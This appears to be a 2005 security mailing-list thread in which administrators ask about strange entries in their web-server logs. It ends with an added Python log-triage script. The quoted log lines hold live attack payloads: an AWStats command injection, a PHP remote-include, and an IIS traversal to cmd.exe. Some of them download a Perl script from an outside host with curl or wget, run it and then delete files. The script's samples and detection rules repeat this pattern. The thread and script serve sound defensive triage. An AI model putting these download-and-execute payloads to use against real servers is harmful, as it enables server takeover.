Security Basics mailing list archives

RE: GET //awstats.pl? in apache logs


From: "mail list" <brad.maillist () gmail com>
Date: Mon, 24 Oct 2005 13:48:55 -0400


Hi all,

I have noticed the same messages turning up in my server logs as well. I
have also noticed a number of other odd entries as well such as the
following:

2005-10-21 14:18:09 192.168.2.100 GET
/scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir 80 - 66.7.71.83 - 404 0 64

2005-10-21 02:09:22 192.168.2.100 GET /web-hints/env.cgi - 80 - 58.51.133.21
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) 404 0 3

As well as a number of long entries such as the following.  

2005-10-23 08:59:10 192.168.2.100 GET /inc/tell_a_friend.inc.php
script_root=http://82.165.168.163/catalog/images/fbi.gif?&cmd=cd%20/tmp;wget
%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;curl%20
-
O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;fetch%
20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;perl%20s
ess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* 80 - 211.38.128.10
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) 200 0 0

I am just wondering what these entries mean.  I can guess what the first two
mean but I want to make sure that I am not going to be compromised.

Thanks in advance,

Brad
http://bradmetz.zapto.org





-----Original Message-----
From: Can't dig that daddy [mailto:cdtdaddy () hotmail it] 
Sent: Monday, October 24, 2005 12:02 PM
To: security-basics () securityfocus com
Subject: Re: GET //awstats.pl? in apache logs

At 21:33, Friday 21 October 2005, Konstantine wrote:
My apache logs show row after row of the following, all from various IP
addresses. This started a couple of days ago. I don't have awstats.
Could somebody tell me what is that? Is there anything I should be
doing? thanks. K.
GET

//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://w
ww.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo|
HTTP/1.1

Bad news:
http://packetstormsecurity.nl/0501-exploits/AWStatsVulnAnalysis.pdf 
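
Added example, not part of the original thread: one way to triage entries like those quoted above, by percent-decoding each request and tagging traversal, remote-include and shell-command patterns. The field order (inferred from the entries shown), the rule names, `classify_uri`/`triage` and the sample lines (documentation addresses and `example.invalid` hosts) are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Field order assumed from the IIS-style entries quoted in the thread.
FIELDS = ("date time s_ip method stem query port user c_ip agent "
          "status substatus win32").split()

RULES = [  # (tag, pattern applied to the percent-decoded URI)
    ("dir-traversal", re.compile(r"\.\.[\\/]")),
    ("windows-shell", re.compile(r"cmd\.exe", re.I)),
    ("remote-include", re.compile(r"=(?:https?|ftp)://", re.I)),
    ("shell-chain", re.compile(r"[;|]\s*(?:wget|curl|fetch|perl|rm|cd|echo)\b", re.I)),
    ("awstats-configdir-pipe", re.compile(r"configdir=\|", re.I)),
]

def classify_uri(uri, rounds=3):
    """Decode repeatedly (catches double encoding), then return matching tags."""
    for _ in range(rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return [tag for tag, rx in RULES if rx.search(uri)]

def triage(line):
    """Parse one log line; flag tagged requests the server did not reject."""
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None  # not in the assumed format
    rec = dict(zip(FIELDS, parts))
    tags = classify_uri(rec["stem"] + "?" + rec["query"])
    status = int(rec["status"])
    # A 4xx/5xx means the server refused or could not find the target.
    # A 2xx/3xx on a tagged request means the server answered it, so check
    # whether that script is installed and whether it is a vulnerable version.
    return {"client": rec["c_ip"], "status": status, "tags": tags,
            "review": bool(tags) and status < 400}

# Constructed sample lines modelled on the thread (documentation IPs/hosts).
SAMPLES = [
    "2005-10-21 14:18:09 192.0.2.10 GET /scripts/..%5c%5c../winnt/system32/cmd.exe"
    " /c+dir 80 - 198.51.100.7 - 404 0 64",
    "2005-10-23 08:59:10 192.0.2.10 GET /inc/tell_a_friend.inc.php"
    " script_root=http://files.example.invalid/x.gif?&cmd=cd%20/tmp;wget%20"
    "http://files.example.invalid/s;perl%20s;rm%20-rf%20s* 80 - 198.51.100.9"
    " Mozilla/4.0 200 0 0",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line))
```

The `review` flag only says the server answered a suspicious request; it does not by itself show that any command ran.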

